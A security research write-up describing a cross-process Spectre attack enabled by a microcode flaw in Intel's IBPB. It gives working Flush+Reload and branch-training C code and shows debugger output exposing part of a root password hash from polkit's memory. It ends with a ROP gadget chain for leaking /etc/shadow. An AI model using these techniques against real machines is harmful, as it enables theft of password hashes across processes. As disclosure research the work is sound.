Cross-Process Spectre Exploitation

By Johannes Wikner

October 18, 2024

I will walk through a cross-process Spectre attack I developed, partly while interning at Open Source Security, Inc.

Cross-Process Spectre

I have developed an exploit to demonstrate the impact of an incomplete Indirect Branch Prediction Barrier (IBPB) that I discovered in Intel Golden Cove and Raptor Cove. IBPB is meant to invalidate all indirect branch target predictions, covering both returns and jump/call instructions that take a memory or register operand (i.e., indirect branches). However, due to buggy microcode -- which appears to be an emergent problem in modern processors -- certain return target predictions are retained across IBPBs.

Back at ETH, Kaveh and I wrote a paper on this matter that we're publishing today along with this write-up. In the paper we also exploited a semantic issue in IBPB on certain AMD parts, leading to privileged memory disclosure on systems using IBPB-on-entry, which ironically is meant to be the more comprehensive mitigation alternative to the suspicious-looking, software-based SafeRET and retbleed thunk mitigations. In this write-up I will focus on the cross-process exploit, which is special for a couple of reasons.

  1. AFAIK, this is the first end-to-end cross-process Spectre exploit that does not target an artificial toy program.
  2. The overwhelming majority of software authors are unconcerned about cross-process Spectre attacks, as indicated by the fact that essentially none of them enable IBPB. The only exception I've seen is Google Chrome.

Unlike OS kernels, which are packed with thousands of lines of code to select the appropriate mitigations to fend off cross-privilege Spectre attacks, user programs do nothing -- even if they run as root and manage sensitive information (e.g., OpenSSH, sudo, polkit). With this work, I hope to convince the authors of such programs to use IBPB. However, even if they had used IBPB, they would still have been vulnerable to the attack I'll explain here. Intel has patched the IBPB issue in a microcode update released earlier this year, so now they would be safe.

What is IBPB?

Branch prediction state is shared across processes running on the same core. While predictions may be restricted to the hardware thread and privilege domain they belong to, programs running in the same thread and privilege domain can influence each other's speculative control flow. To prevent this, IBPB should be used. IBPB is triggered from the privileged domain with a Model-Specific Register (MSR) write:

    movq   $0x49, %rcx  # MSR_IA32_PRED_CMD
    movq   $1, %rax     # PRED_CMD_IBPB
    xor    %rdx, %rdx
    wrmsr

User programs can enable this via the prctl() ABI. Besides user programs, hypervisors like KVM unconditionally use IBPB when switching vCPUs. It is also likely -- though I didn't test it, and it is not explicitly documented -- that transitioning to SGX enclaves and to SMM imposes an implicit IBPB as well.
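A minimal sketch of the opt-in (my own example, not from the exploit): with PR_SPEC_FORCE_DISABLE, the kernel keeps indirect branch speculation disabled for the task for good, issuing an IBPB when switching between it and other tasks (the exact behavior depends on the spectre_v2_user= boot parameter).

#include <stdio.h>
#include <sys/prctl.h>
#include <err.h>

#ifndef PR_SPEC_INDIRECT_BRANCH /* in case of old headers */
#define PR_SET_SPECULATION_CTRL 53
#define PR_SPEC_INDIRECT_BRANCH 1
#define PR_SPEC_FORCE_DISABLE (1UL << 3)
#endif

int main(void) {
    /* FORCE_DISABLE: disable indirect branch speculation against this
     * task and refuse any later attempt to re-enable it. */
    if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH,
              PR_SPEC_FORCE_DISABLE, 0, 0))
        err(1, "PR_SET_SPECULATION_CTRL");
    puts("IBPB on context switch enabled");
    return 0;
}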

Before delving deeper, we'll cover some additional background on Spectre attacks.

How Spectre mis-speculations are exploited

Most of us are aware of at least some of the various Spectre vulnerabilities that modern processors are susceptible to. In a Spectre attack, the goal of the attacker is to leak unauthorized data by combining transient execution of incorrect control flow, caused by a branch misprediction, with side-channel analysis.

Branch misprediction

Branch prediction concerns conditional branch directions (e.g., taken vs. fall-through) and branch target addresses, stored in microarchitectural, core-local, table-like data structures. Our focus is on branch target address predictions. Intel processors are known to store these in Branch Target Buffers (BTBs) and TAGE-table-like structures. We do not need to understand exactly how these work. However, for a mental picture, I show an illustration of my own view below. I copied the details about Intel's TAGE configuration from the recent Indirector paper. (I am not claiming that this resembles any actual implementation, but it works for the purpose of this write-up.)

IP[23:0]----------+
                  |
       +----------v--------------+
       | BTB                     |
       |-------------------------|
Set 0  | Entry0 | ... | Entry 11 |      +---------------------------------------------+
Set 1  | Entry0 | ... | Entry 11-+----->| BTB entry                                   |
Set .. |                         |      |---------------------------------------------|
Set 1K | Entry0 | ... | Entry 11 |      | 8bit | 1bit   | 2bit | 2bit | 1bit | 32bit  |
       +-------------------------+      | TAG  | THREAD | PL   | TYPE | OF   | TARGET |
                                        +--------------------------|------------------+
           +-----------------+--------------------+----------------+
           |                 |                    |                |
        "RETURN"    ,--> "INDIRECT"    ,-----> "DIRECT" <-,   "CONDITIONAL"
           |        |        |   no-path-correl.  |       |        |
        +-----+   "RSBA"     v         |          v     Taken      v
        | RSB |-----'      "TAGE"------'        TARGET    '------ PHT
        +-----+             VVVV

IP[15:6]---------+-----------------------+----------------------+
                 |                       |                      |
             BHB[67:0]               BHB[131:0]             BHB[387:0]
                 |                       |                      |
        +--------v--------+     +--------v--------+     +-------v---------+
        | TAGE1           |     | TAGE2           |     | TAGE3           |
        |-----------------|     |-----------------|     |-----------------|
Set  0  | Entry0 | Entry1 |     | Entry0 | Entry1 |     | Entry0 | Entry1 |
Set  1  | Entry0 | Entry1 |     | Entry0 | Entry1 |     | Entry0 | Entry1 |
Set ..  |      ....       |     |      ....       |     |      ....       |
Set 512 | Entry0 | Entry1 |     | Entry0 | Entry1 |     | Entry0 | Entry1 |
        +----|------------+     +-----------------+     +-----------------+
             |                                                   ^
             |                              194 branches hist----'
             |
  +----------v------------+
  | TAGE entry            |
  |-----------------------|
  | 10bit | 48bit  | 2bit |
  | TAG   | TARGET | PL   |
  +-----------------------+

The BTB is a set-associative buffer indexed by the current Instruction Pointer (IP), where each BTB entry contains a static target and a type. If the type is INDIRECT, the (indirect) branch target prediction is in fact dynamic and depends on the path history. If the type is RETURN, we should receive the branch target from the Return Stack Buffer (RSB), which records the upcoming return address for every encountered call instruction. Storing branch type information within the BTB allows the processor to prepare a prediction ahead of time, before instruction decode of the branch source has completed, which can lead to Phantom speculation, which SRSO exploits.

For indirect branch target prediction, the BTB becomes the 0th-level "tagless" TAGE table, used when there is no correlation between path history and the branch. Otherwise, we also consider the branch targets from higher-level TAGE tables, picking the target that correlates with the longest path history. Intel refers to this path history as a Branch History Buffer (BHB). If the current BHB does not correlate with any prediction in the TAGE tables, we fall back to the static target of the BTB.

For return target prediction, the BTB and TAGE entries may also become relevant should the RSB not provide a valid target, for example because the RSB is empty. If so, Intel's "bottom-less" RSB instead uses an alternate prediction scheme (RSBA), which essentially means treating the BTB entry of the return as if it had type INDIRECT. For this to work, every time a return is executed, it not only updates the RSB state but also updates the indirect branch predictor with return targets.

Additional information needs to be stored as well, such as the privilege level (PL), the hardware thread (THREAD), and an overflow bit (OF) that indicates whether a direct branch target crosses a 4 GiB boundary. I also imagine that whether the branch is a CALL might be recorded, for faster RSB updates.
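To make the selection logic above concrete, here is a toy model in C -- my own simplification for illustration, with field widths taken from my diagrams rather than any confirmed implementation:

#include <stdint.h>
#include <stddef.h>

enum btype { BT_COND, BT_DIRECT, BT_INDIRECT, BT_RETURN };

struct btb_entry  { uint64_t tag:8, thread:1, pl:2, type:2, of:1, target:32; };
struct tage_entry { uint64_t tag:10, target:48, pl:2; };

/* btb: the entry found via IP[23:0] (or NULL); tage: the entry with the
 * longest matching BHB history (or NULL); rsb_top: the RSB prediction,
 * 0 if the RSB is empty. */
static uint64_t predict(const struct btb_entry *btb,
                        const struct tage_entry *tage, uint64_t rsb_top)
{
    if (!btb)
        return 0;                   /* no prediction at all */
    switch (btb->type) {
    case BT_RETURN:
        if (rsb_top)
            return rsb_top;         /* the normal return prediction */
        /* RSB empty: the "bottom-less RSB" (RSBA) treats the return
         * like an indirect branch -- fall through. */
    case BT_INDIRECT:
        if (tage)
            return tage->target;    /* path-correlated, full-width target */
        /* no BHB correlation: fall through to the static target. */
    case BT_DIRECT:
        return btb->target;         /* lower 32 bits only! */
    default:
        return 0;                   /* conditional: the PHT only picks
                                       taken vs. fall-through */
    }
}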

Side-channel analysis

What we most commonly see in Spectre attacks is that the attacker forces the victim to make a misprediction, transiently access unauthorized memory ("secrets"), and use it in subsequent "secret"-dependent operations. The attacker can then deduce the secret via a Flush+Reload (F+R) side channel. F+R is a comparatively fast and low-noise side channel, but it relies on memory being shared between the attacker and the victim. That is usually not a concern, however. For example, all user memory is shared with the kernel via the physmap, and the non-writable sections of shared libraries are shared across all processes using the library (so you don't need to keep 1000 copies of glibc in memory for every running program ;))

Flush+Reload

Here is an F+R example. We introduce a "reloadbuffer" RB that contains a number of "entries", which are flushed and then reloaded while measuring their access times, revealing whether the memory was fetched in between. Each entry has a corresponding bin in a histogram RB_HIST. When reloading, if there is a cache hit on a particular entry (deduced from its access time), the respective bin is incremented.

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <err.h>

/* it's generally better to hardcode hit/miss threshold than to compute it:
 * 1. threshold becomes an immediate
 * 2. calibrating requires a warmup to get stable value => slow.
 * The following should detect LLC misses on all microarchs. */
#ifndef CACHE_MISS_THRES
#define CACHE_MISS_THRES 150
#endif

#ifndef RB_PTR
/* The Reload Buffer "RB" is given a hardcoded address so that it is
 * unlikely to neighbor other data */
#define RB_PTR 0x13200000UL
#endif
#ifndef RB_STRIDE
/* Each cache line that we flush+reload is separated by 4096 bytes. Smaller
 * strides are possible, but increase the chance of data cache prefetching =>
 * noisy results.
 */
#define RB_STRIDE (1UL<<12)
#endif
#ifndef RB_SLOTS
/* If we're just testing if a side channel works, we are fine with just a few
 * entries. To leak full bytes we would need 256 entries. */
#define RB_SLOTS 8
#endif
#ifndef SECRET
/* If we're just testing if a side channel works, we can aim at leaking a
 * pre-determined "secret" value. */
#define SECRET 6
#endif
#ifndef RB_OFFSET
/* Rather than reloading a page-aligned address, we can pick something else.
 * The first few CLs of a page are more likely prefetched than others. */
#define RB_OFFSET 0x180
#endif
#ifndef RB_HIST
/* We keep the results in a histogram with RB_SLOTS bins. We give it a fixed
 * address too to make the reloading code position independent. */
#define RB_HIST 0x1800000
#endif

#ifndef mb
/* Wait for all memory operations to complete before continuing. */
#define mb() asm("mfence" ::: "memory");
#endif

typedef unsigned long u64;
typedef unsigned int u32;
typedef unsigned char u8;

/* Start measure */
static __always_inline u64 rdtsc(void) {
    unsigned lo, hi;
    asm volatile ("lfence\n\t"
            "rdtsc\n\t"
            : "=d" (hi), "=a" (lo));
    return ((u64)hi << 32) | lo;
}

/* Stop measure */
static __always_inline u64 rdtscp(void) {
    unsigned lo, hi;
    asm volatile("rdtscp\n\t"
            "lfence\n\t" : "=d" (hi), "=a" (lo)
            :: "ecx");
    return ((u64)hi << 32) | lo;
}

/**
 * Reload the n cache lines used for flush+reload. If access time is below the
 * threshold, increment the respective counter for the histogram/results.
 */
static __always_inline void reload_range(long base, long stride, int n, u64 *results) {
    mb();
    /* unroll the loop to avoid triggering data cache prefetcher. */
#pragma clang loop unroll(full)
    for (u64 k = 0; k < n; ++k) {
        /* semi-randomize the reload-order to avoid triggering data cache prefetcher */
        u64 c = (k*7+5)&(n-1);
        unsigned volatile char *p = (u8 *)base + (stride * c);
        u64 t0 = rdtsc();
        *(volatile unsigned char *)p;
        u64 dt = rdtscp() - t0;
        if (dt < CACHE_MISS_THRES) results[c]++;
    }
}

/**
 * Flush all the cachelines used for flush+reload.
 */
static __always_inline void flush_range(long start, long stride, int n) {
    mb();
    for (u64 k = 0; k < n; ++k) {
        volatile void *p = (u8 *)start + k * stride;
        asm volatile("clflushopt %0\n" ::"m"(*(const char *) p));
    }
}

static u8* rb = (u8 *)RB_PTR;
static u64 *rb_hist = (u64 *)RB_HIST;

#define ROUND_2MB_UP(x) (((x) + 0x1fffffUL) & ~0x1fffffUL)

/* Prefer huge pages for the reloadbuffer => less noise. */
#define RB_SZ ROUND_2MB_UP((RB_SLOTS * RB_STRIDE) + 0x1000UL)
#define MMAP_FLAGS (MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED_NOREPLACE)

/**
 * Convenience macros.
 */
#define rb_reset() memset(rb_hist, 0, RB_SLOTS * sizeof(*rb_hist))
#define rb_flush() flush_range(RB_PTR+RB_OFFSET, RB_STRIDE, RB_SLOTS);
#define rb_reload() reload_range(RB_PTR+RB_OFFSET, RB_STRIDE, RB_SLOTS, rb_hist);

/**
 * Initialize flush+reload buffer referenced by (RB_PTR) and the results
 * (RB_HIST).
 */
static void rb_init() {
    /* Histogram, or simply put, the results. */
    if (mmap((void *)RB_HIST, RB_SLOTS*sizeof(u64), PROT_READ | PROT_WRITE, MMAP_FLAGS|MAP_POPULATE, -1, 0) == MAP_FAILED) {
        err(1, "rb_hist");
    }
    if (mmap((void *)RB_PTR, RB_SZ, PROT_READ | PROT_WRITE, MMAP_FLAGS, -1, 0) == MAP_FAILED) {
        err(1, "rb");
    }

    /* Try to make this page a single 2MB page, to avoid TLB missing when
     * reloading. */
    madvise((void *)RB_PTR, RB_SZ, MADV_HUGEPAGE);
    memset((void *)RB_PTR, 0xcc, RB_SZ); /* Make sure it isn't zero-page backed*/
}

#define ROUNDS 1000
int main(void) {
    rb_init();
    rb_flush();
    rb_reset();
    for (int i = 0; i < ROUNDS; ++i) {
        rb_flush();
        mb();
        // touch something.
        *(u8*) (RB_PTR+RB_OFFSET+SECRET*RB_STRIDE) = 12;
        mb();
        // we will be able to deduce what entry was touched.
        rb_reload();
    }
    // print each bin.
    for (int i = 0; i < RB_SLOTS; ++i) {
        printf("%04ld ", rb_hist[i]);
    }
    printf("\n");
    return 0;
}

The code should be compiled with clang, with optimizations enabled. Running it will result in the entry index defined by SECRET getting hot.

clang -Og -DSECRET=6 ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0000 0000 0000 0000 1000 0000

clang -Og -DSECRET=4 ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0000 0000 0999 0000 0000 0000

Notice how the results turn noisier if we, for example, reduce the stride and increase the number of entries (n.b., it must still be a power of 2).

clang -Og -DRB_SLOTS=32 -DRB_STRIDE=128L ./ex1.c -o ex1 && ./ex1
# > 0000 0000 0003 0002 0002 0000 0999 0000 0000 0001 0000 0000 0000 0000 0000 0000 0000 0000 0001 0000 0001 0001 0000 0001 0001 0000 0000 0001 0000 0000 0000 0000

Comparing the signal of the expected-hot entry with the other entries lets us infer how noisy the measurement is, and it lets us detect bugs. For example, if we forget to enable optimizations, we immediately see that something is not right.

clang ./ex1.c -o ex1 && ./ex1
# > 0999 1000 0996 0999 0125 0000 1000 0000

We will use F+R to observe indirect branch target misprediction.

Observe indirect branch misprediction

There is a key difference between path-history-based and IP-based indirect branch target prediction: the IP-based one uses the BTB, which holds only the lower 32 bits of the target. We can observe this with a simple F+R experiment.

Consider the following four snippets.

/* training branch source */
mk_snip(tr_src,
    "mov $" STR(RB_PTR) ", %rax;"
    "clflush (%rdi);"
    "mfence        ;"
#ifdef USE_RET
    "push (%rdi)   ;"
    "ret           ;"
#else
    "jmp *(%rdi)   ;"
#endif
);

/* victim branch source */
mk_snip(vi_src,
    "mov $" STR(RB_PTR) ", %rax;"
    "clflush (%rdi);"
    "mfence        ;"
#ifdef USE_RET
    "push (%rdi)   ;"
    "ret           ;"
#else
    "jmp *(%rdi)   ;"
#endif
);

/* This one will never be executed architecturally */
mk_snip(tr_dst_IP,
    /* signals "2", assumes RB_PTR in rax */
    "mov " STR(RB_OFFSET + RB_STRIDE * 2)"(%rax), %rax;"
    "lfence;"
    "ret;"
);

mk_snip(tr_dst_BHB,
    /* signals "4", assumes RB_PTR in rax */
    "mov " STR(RB_OFFSET + RB_STRIDE * 4)"(%rax), %rax;"
    "lfence;"
    "ret;"
);

We assign these snippets the following code pointers.

init_snip(&tr_src_desc,     0x10000000000, tr_src);
/*                                v- bit 24 */
init_snip(&vi_src_desc,     0x01001000000, vi_src);
/*                               v-- bit 32  */
init_snip(&tr_dst_BHB_desc, 0x10020000000, tr_dst_BHB); /* Near the tr_src */
init_snip(&tr_dst_IP_desc,  0x01020000000, tr_dst_IP);  /* Near the vi_src */
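These addresses are chosen so that the two branch sources collide in the bits the BTB uses, while the two destinations share their lower 32 bits. A quick sanity check of that arithmetic (ALIAS and check_layout are my own helpers, not part of the test framework):

#include <assert.h>

#define LOW(bits) ((1UL << (bits)) - 1)
#define ALIAS(a, b, bits) ((((a) ^ (b)) & LOW(bits)) == 0)

static void check_layout(void)
{
    /* sources collide in IP[23:0], the bits addressing the BTB */
    assert(ALIAS(0x10000000000UL, 0x01001000000UL, 24)); /* tr_src ~ vi_src */
    /* destinations share their lower 32 bits, all a BTB target can hold */
    assert(ALIAS(0x10020000000UL, 0x01020000000UL, 32)); /* tr_dst_BHB ~ tr_dst_IP */
}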

The BTB on Golden Cove and Raptor Cove is addressed using only the lower 24 bits of the IP. Hence, tr_src and vi_src resolve to the same BTB set and tag (i.e., they alias). After we execute tr_src with a pointer to tr_dst_BHB in rdi, a new prediction is created. The BTB, however, only holds the lower 32 bits of the target, while the full target is stored in the TAGE tables. So the question is: after training tr_src with tr_dst_BHB as the target, will tr_dst_BHB or tr_dst_IP be predicted when we execute vi_src?

Assuming the path history leading up to vi_src is different, it might predict tr_dst_IP once. The next time around, however, it will have recognized the mistake and avoid repeating it. To make it consistently mispredict either tr_dst_IP or tr_dst_BHB, we need to introduce path history.

#define OP_RET 0xc3
#define BHB_AREA 0x4400000000L

static void init_bhb_area() {
    if (mmap((void *)BHB_AREA, 1L<<24, PROT_READ|PROT_WRITE|PROT_EXEC, MMAP_FLAGS, -1, 0) == MAP_FAILED) {
        err(1, "bhb_area");
    }
}

static void random_bhb(u64 *bhb, int n) {
    for (int i = 0; i < n; ++i) {
        // some random sequence of return branches in the BHB_AREA
        bhb[i] = BHB_AREA + (random()%(1L<<24));
        *(u8 *) bhb[i] = OP_RET;
    }
}

#define BHB_LEN 195

static u64 bhb[BHB_LEN];
static code_snip_t tr_src_desc, vi_src_desc, tr_dst_BHB_desc, tr_dst_IP_desc;
int main(void) {
    init_bhb_area();
    srandom(getpid());
    random_bhb(bhb, BHB_LEN);

    init_snip(&tr_src_desc,     0x10000000000, tr_src);
    init_snip(&tr_dst_BHB_desc, 0x10020000000, tr_dst_BHB);
    init_snip(&vi_src_desc,     0x01001000000, vi_src);
    init_snip(&tr_dst_IP_desc,  0x01020000000, tr_dst_IP);

    #define ROUNDS 1000
    for (int i = 0; i < ROUNDS; ++i) {
        /* train */
        asm(
            "lea 33f(%%rip), %%rax ;" /* return address after training */
            "push %%rax            ;"
            "push %1               ;" /* training source */
            "mov %0, %%rbx         ;" /* add the branch history*/
            ".rept " STR(BHB_LEN) ";"
            "  push (%%rbx)        ;"
            "  add $8, %%rbx       ;"
            ".endr                 ;"
            "ret                   ;" /* go through BHB, then branch source */
            "33:                   ;"
            :: "r"(bhb), "r"(tr_src_desc.ptr), "D"(&tr_dst_BHB_desc.ptr) : "rax", "rbx");
        rb_flush();

        /* DO STUFF HERE */

        /* run victim */
        asm(
            "lea 33f(%%rip), %%rax ;"
            "push %%rax            ;" 
            "mov %%rsp, %%rdi      ;" /* vi_src will take us right back to "33:" */
            "push %1               ;"
            "mov %0, %%rbx         ;"
            ".rept " STR(BHB_LEN) ";"
            "  push (%%rbx)        ;"
            "  add $8, %%rbx       ;"
            ".endr                 ;"
            "ret                   ;"
            "33:                   ;"
            "add $8, %%rsp         ;" /* re-adjust stack */
            :: "r"(bhb), "r"(vi_src_desc.ptr): "rdi", "rax", "rbx");
        rb_reload();
    }
    rb_print();
    return 0;
}

If we run this, we get:

0000 0000 0000 0000 1000 0000 0000 0000 # jmp*, matching bhb

Unsurprisingly, thanks to the matching path-history leading up to vi_src and tr_src, vi_src mispredicts tr_dst_BHB. If we instead randomize the BHB before we run vi_src, for example by inserting random_bhb(bhb, BHB_LEN); before /* run victim */, we get instead:

0000 0000 0930 0000 0001 0000 0000 0000 # jmp*, randomized bhb

So the misprediction now took us to tr_dst_IP -- which is funny, because we never executed that code in the program. We can now do the same thing with USE_RET defined, using returns instead, and get:

0000 0000 0000 0000 0979 0000 0000 0000 # ret, matching bhb
0000 0000 0324 0000 0000 0000 0000 0000 # ret, randomized bhb

So we get the same result, but with a somewhat weaker signal. Many of you might find it strange to see what appears to be indirect branch target predictions on top of returns. However, this is an Intel feature that has many names, such as "bottom-less RSB", "RSBA", and "RRSBA". Return Stack Buffer Alternate (RSBA) occurs when the RSB is empty. Because of our long path history, consisting only of returns, the RSB is guaranteed to be empty when we hit the victim branch, hence we get RSBA. To be precise, on eIBRS systems we call it Restricted RSBA (RRSBA), since the alternate predictions (not the RSB predictions) are protected by eIBRS (they are indirect branch predictions, after all).
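Whether a part may fall back to alternate predictions on RSB underflow is enumerated in IA32_ARCH_CAPABILITIES (MSR 0x10a), bit 19, "RRSBA". Here is a quick check through the msr driver (my own snippet; needs root and modprobe msr):

#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <err.h>

int main(void)
{
    uint64_t cap;
    int fd = open("/dev/cpu/0/msr", O_RDONLY);
    if (fd < 0)
        err(1, "open /dev/cpu/0/msr (try: modprobe msr)");
    /* the msr driver reads the MSR whose number is the file offset */
    if (pread(fd, &cap, sizeof(cap), 0x10a) != sizeof(cap))
        err(1, "rdmsr IA32_ARCH_CAPABILITIES");
    printf("RRSBA: %s\n", (cap >> 19) & 1 ? "yes" : "no");
    close(fd);
    return 0;
}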

Bring in IBPB

The next thing now is to test how well IBPB works. There's a super easy way (thanks to bsdaemon ;)) to trigger IBPB on Linux 6.2+; we can just do:

prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, PR_SPEC_FORCE_DISABLE, 0, 0);
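On kernels that predate this prctl mode, the same barrier can be issued from a tiny kernel module. A minimal sketch -- the debugfs interface and names are mine; the write handler performs the same PRED_CMD MSR write as the asm earlier:

#include <linux/module.h>
#include <linux/debugfs.h>
#include <asm/msr.h>

static ssize_t ibpb_write(struct file *f, const char __user *buf,
                          size_t len, loff_t *off)
{
    /* PRED_CMD.IBPB = 1, issued on the calling CPU */
    wrmsrl(MSR_IA32_PRED_CMD, PRED_CMD_IBPB);
    return len;
}

static const struct file_operations ibpb_fops = {
    .owner = THIS_MODULE,
    .write = ibpb_write,
};
static struct dentry *ibpb_file;

static int __init ibpb_init(void)
{
    /* echo 1 > /sys/kernel/debug/ibpb to trigger the barrier */
    ibpb_file = debugfs_create_file("ibpb", 0200, NULL, NULL, &ibpb_fops);
    return 0;
}

static void __exit ibpb_exit(void)
{
    debugfs_remove(ibpb_file);
}

module_init(ibpb_init);
module_exit(ibpb_exit);
MODULE_LICENSE("GPL");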

I was on Ubuntu with a 5.15.0-97-generic kernel while doing this work, so I did the same using a kernel module along those lines instead. Now, if we issue an IBPB after training and test vi_src for (1) path-based and (2) IP-based predictions, for (a) an indirect branch and (b) a return, we get something unexpected.

0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, jmp*, (1,a)
0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, ret,  (1,b)
0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, jmp*, (2,a)
0000 0000 0155 0000 0000 0000 0000 0000 # ibpb, ret,  (2,b)

We are still getting signal from tr_dst_IP, post-IBPB! It took a while to conclude that this was not a software bug. In fact, it is a microcode bug: the prediction is retained across the IBPB. But what should we do with this interesting effect?

Build a cross-process Spectre leak

Two things that IBPB is used for are context switches and vCPU switches. While it would be cool (and certainly not impossible) to leak information from a co-tenant VM with this primitive, it appears easier to prove the impact of the vulnerability by targeting context switches between processes.

The funny thing, however, is that nobody appears to have built a real cross-process Spectre attack before. So in order to prove that IBPB bugs are a real problem, we must first build a cross-process Spectre exploit -- one that IBPB should protect against.

Another funny thing is that the only victim candidate I found that was using IBPB was Google Chrome. But we are already deep down in a mess, and descending deeper, into JavaScript hell, would not do my sanity well.

Instead we will target a SUID program that lets you authenticate as root via a password prompt. After a bit of poking around, I decided that polkit appeared to be a perfect victim, specifically the /usr/libexec/polkit-agent-helper-1 that is present on most Linux machines.

polkit-agent-helper-1 is not meant to be run by humans, but reading its source code shows that it takes two arguments: the user to authenticate as (we will use root, of course) and a "cookie", which we don't really care about. Also, stdin must be anything but a tty for it to work. So we can run it like:

while true; sleep 2; do echo -n A; done | /usr/libexec/polkit-agent-helper-1 root asdfadsf
# > PAM_PROMPT_ECHO_OFF Password:

Since the attacker can obtain the same binaries and libraries as the victim (e.g., via apt repos), they can debug this program with full privileges locally. So I ran strace on it:

while true; sleep 2; do echo -n A; done | sudo strace -eopenat,read /usr/libexec/polkit-agent-helper-1 root asdfadsf
# > read(3, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 2669
# > openat(AT_FDCWD, "/etc/shadow", O_RDONLY|O_CLOEXEC) = 3
# > read(3, "root:$6$HGU6y/YF5$rf5na/CbCxzKWR"..., 4096) = 1651
# > PAM_PROMPT_ECHO_OFF Password:
# > read(0, "A", 4096)                      = 1
# > read(0, "A", 4096)                      = 1
# > read(0, "A", 4096)                      = 1
# > read(0, ^Cstrace: Process 334359 detached
# >  <detached ...>

This is fantastic and weird at the same time! It reads the password hashes from /etc/shadow before even taking the password. It appears that libpam, which manages the authentication, does this to check that the password is valid and hasn't expired. It also stores the password hash in memory, inside the pam context.

We want to hijack a return in this process by first training it in our attacker process, then triggering the victim process to run by sending a character to its stdin.

To figure out which returns are available, we can use Intel PT (via perf) to create a --call-ret trace. I traced all calls and rets from my process, which sent a character to the victim and went idle, through the kernel, and into the victim receiving it. There are three returns, all in glibc in the victim, that could be exploited if predicted with RRSBA: in read, _IO_file_underflow, and _IO_default_uflow. Unfortunately, they are not predicted with RRSBA, because the call depth imposed by read in the victim is too shallow. However, the victim accepts any kind of stdin, except a tty. So instead of attaching a normal pipe to interact with the victim's stdin, we can attach a socket. Because sockets are much more complicated to read from, the read call depth of the victim now exceeds the RSB capacity, leading to exploitable RRSBA predictions for all three returns.

We take a look at _IO_default_uflow in gdb, and what we find is surprising!

Breakpoint 1, 0x00007ffff7c46db0 in __GI__IO_default_uflow (fp=<optimized out>) at ./libio/genops.c:366
366     ./libio/genops.c: No such file or directory.
   0x00007ffff7c46daf <__GI__IO_default_uflow+79>:      5d      pop    %rbp
=> 0x00007ffff7c46db0 <__GI__IO_default_uflow+80>:      c3      ret
   0x00007ffff7c46db1 <__GI__IO_default_uflow+81>:      0f 1f 80 00 00 00 00    nopl   0x0(%rax)
(gdb) i r
rax            0x41                65
rbx            0x0                 0
rcx            0x7ffff7ccd7e2      140737350784994
rdx            0x555555596301      93824992502529
rsi            0x555555596300      93824992502528
rdi            0x0                 0
rbp            0xa                 0xa
rsp            0x7fffffffe148      0x7fffffffe148
r8             0x0                 0
r9             0x555555596300      93824992502528
r10            0x7ffff7dd4270      140737351860848
r11            0x246               582
r12            0x7ffff7dd3aa0      140737351858848
r13            0x0                 0
r14            0x7fffffffe1f0      140737488347632
r15            0x1ff               511
rip            0x7ffff7c46db0      0x7ffff7c46db0 <__GI__IO_default_uflow+80>
eflags         0x202               [ IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) x/s $rsi
0x555555596300: "Aoot:$6$HGU6y/YF5$rf5na/CbCxzKWRjrkPYDb1oN5ZI7TSxVs8Epz79q9jUyZnIqmmIGYd4lzOVa8I4yyGQ2SSjyd0op5mujCdX4Q.:19755:0:99999:7:::\ndaemon:*:19235:0:99999:7:::\nbin:*:19235:0:99999:7:::\nsys:*:19235:0:99999:7::"...

As we read entered characters from the password prompt, the stream buffer that receives stdin's password input (here, the 'A's) already contains the secret we want to leak, and it's referenced by three different registers! Even better, the last entered character sits in rax, which can act as an index to target a specific byte of the secret. How did that happen?

Because the password hashes were read right before presenting the password prompt, the most recently freed memory was the stream buffer of the file handle for /etc/shadow. When we immediately allocate a new stream buffer for stdin, which is the same size as the previous one, malloc recycles that memory. So the memory that rsi, rdx, and r9 reference is in fact simply uninitialized memory that happened to hold secrets just before.
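The recycling is easy to reproduce in isolation. In a fresh process, a freed chunk that sits next to the top of the heap is consolidated and handed right back by the next same-sized malloc, contents intact. A toy sketch (not polkit's actual allocation pattern):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    char *shadow_buf = malloc(4096);   /* "stream buffer" for /etc/shadow */
    strcpy(shadow_buf, "root:$6$...a-password-hash...:19755:0:99999:7:::");
    free(shadow_buf);                  /* fclose() of /etc/shadow */

    char *stdin_buf = malloc(4096);    /* new stream buffer for stdin */
    stdin_buf[0] = 'A';                /* the one byte read() so far */
    printf("%p %p\n%s\n", (void *)shadow_buf, (void *)stdin_buf, stdin_buf);
    /* typically prints the same address twice, then the stale "hash"
     * with only its first byte overwritten: "Aoot:$6$..." */
    return 0;
}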

But how should we leak the secret?

Gadget chain

We know that we can hijack a return and make it speculatively execute a target of our choice in the victim's address space. The speculated target needs to read a byte of the secret using rax as an index. Then we need to transmit it to the attacker over an F+R side channel. Because read-only sections of shared libraries are shared in physical memory, the idea is to use the executable section of glibc, referenced by rcx and rip, as the "reloadbuffer". So we want to make a secret-dependent memory access relative to rcx or rip, so that we can later deduce the secret in the attacker's process.

I realized that I was not going to find this easily in one single piece of code in the victim that both reads and leaks bytes of the secret. However, maybe it is possible to stitch together a chain of gadgets, each performing one of the necessary operations, and trigger a series of nested return mispredictions to speculatively execute all of them. At this point, I was mildly exhausted, so I reached out to the very encouraging and enthusiastic security folks at Google. They told me that they would be happy to find me a ROP-gadget chain -- they are a search company after all! Indeed, a few days later Chani Jindal sent me a perfect-looking gadget chain:

0x7ffff68efa69: movzx eax, byte [rax+rdx] ; ret ; (/usr/lib/x86_64-linux-gnu/libicuuc.so.70.1)
0x7ffff7cef5b7: rol eax, 0x08 ; ret             ; (/usr/lib/x86_64-linux-gnu/libc.so.6)
0x7ffff75f45ec: shl rax, 0x02 ; ret             ; (/usr/lib/x86_64-linux-gnu/libzstd.so.1.4.8)
